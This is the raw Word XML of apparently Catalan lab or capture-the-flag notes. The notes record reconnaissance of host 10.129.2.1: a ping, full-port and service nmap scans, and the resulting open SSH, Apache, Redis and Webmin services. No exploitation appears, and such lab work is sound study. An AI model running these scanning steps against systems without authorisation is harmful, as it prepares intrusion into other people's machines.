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F2C62" w14:textId="42C3715B" w:rsidR="004F42AA" w:rsidRDefault="00D3214C">
      <w:r>
        <w:t xml:space="preserve">1-&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Comprovacio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de que es una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>posiblr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> maquina Linux : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696CF353" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C"/>
    <w:p w14:paraId="531714C2" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>❯</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ping -c 1 10.129.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378447B2" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">PING 10.129.2.1 (10.129.2.1) 56(84) bytes </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BF3CBF" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">64 bytes </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 10.129.2.1: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>icmp_seq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">=1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ttl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=63 time=101 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8A575D" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C"/>
    <w:p w14:paraId="55463472" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">--- 10.129.2.1 ping </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>statistics</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0156D2F5" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">1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, 1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>received</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, 0%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loss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, time 0ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADEC745" w14:textId="7AE7B6CD" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rtt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> min/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>avg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>max</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mdev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 101.169/101.169/101.169/0.000 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4BEEAC" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C"/>
    <w:p w14:paraId="1818559C" w14:textId="0A17FE61" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">2-&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Escanegi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de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oberts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24592584" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C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-n -p- --open -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vvv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 10.129.2.1 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oG</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>allPorts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0B00FD4B" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Starting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7.99 ( https://nmap.org ) at 2026-05-21 09:35 +0200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4001CC89" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Initiating</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stealth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at 09:35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201076A4" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Scanning</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 10.129.2.1 [65535 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ports</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A4475F" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Discovered</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 80/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp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10.129.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27737412" w14:textId="6352E086" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Discovered</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 22/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp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10.129.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296661BE" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C"/>
    <w:p w14:paraId="0F05FDDC" w14:textId="7E8D2A95" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Obrim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>allPorts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A745C33" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C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extractPorts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>allPorts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3D01EF76" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t>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4C6108" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">     │ File: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>extractPorts.tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2333173F" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t>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F8D39" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">   1 │ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A9AC88" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">   2 │ [*] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Extracting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...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254CBBBE" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   3 │ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCB35CD" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">   4 │     [*] IP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: 10.129.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDBC1C8" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">   5 │     [*] Open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ports</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: 22,80,6379,10000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A5D3FF" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">   6 │ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4AB7B2" w14:textId="6EC2BC45" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">   7 │ [*]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clipboard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="65CC26D0" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C"/>
    <w:p w14:paraId="0620DAB3" w14:textId="79B9363E" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">3-&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mirem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> les versión i </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>els</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> posibles scripts contra </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>auqests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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oberts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5781BC2E" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C"/>
    <w:p w14:paraId="4A8F76A8" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C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-n -p22,80,6379,10000 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sCV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 10.129.2.1 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2197A479" w14:textId="7CC7F3A1" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Starting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7.99 ( https://nmap.org ) at 2026-05-21 09:38 +0200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C505F7F" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C"/>
    <w:p w14:paraId="2171F1B2" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C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cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B51FB9A" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t>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2E16CB" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">     │ File: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1A2D270A" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t>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3F7470" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">   1 │ # </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 7.99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initiated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May 21 09:38:25 2026 as: /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>privileged</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -n -p22,80,6379,10000 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sCV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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 10.129.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A62DA50" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">   2 │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10.129.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5DD894" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">   3 │ Host </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>is</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> up (0.10s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>latency</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644A4B01" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">   4 │ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112C49C5" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">   5 │ PORT      STATE SERVICE VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B16CD53" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">   6 │ 22/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">    open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OpenSSH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>protocol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CFE349" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">   7 │ | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh-hostkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164F445C" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">   8 │ |   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FE32EB" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">   9 │ |   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F455BD" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  10 │ |_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6389EA95" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">  11 │ 80/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">    open  http    Apache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2.4.29 ((Ubuntu))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF93570" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">  12 │ |_http-server-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Apache/2.4.29 (Ubuntu)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F83E553" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">  13 │ |_http-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Geek's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Personal </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Website</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4201809C" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">  14 │ 6379/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>redis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">   Redis </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>key-value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> store 4.0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAFCA3F" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">  15 │ 10000/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open  http    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MiniServ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1.910 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Webmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EEAA1A" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">  16 │ |_http-server-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MiniServ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/1.910</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070091C6" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">  17 │ |_http-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: Site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title</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>html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=iso-8859-1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE502BE" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">  18 │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: OS: Linux; CPE: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cpe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>o:linux:linux_kernel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5BA6F422" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">  19 │ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF0B6A3" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">  20 │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at https://nmap.org/submit/ .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68080756" w14:textId="639B4F79" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">  21 │ # </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> done at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Thu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> May 21 09:39:03 2026 -- 1 IP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (1 host up) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scanned</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in 37.25 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>seconds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
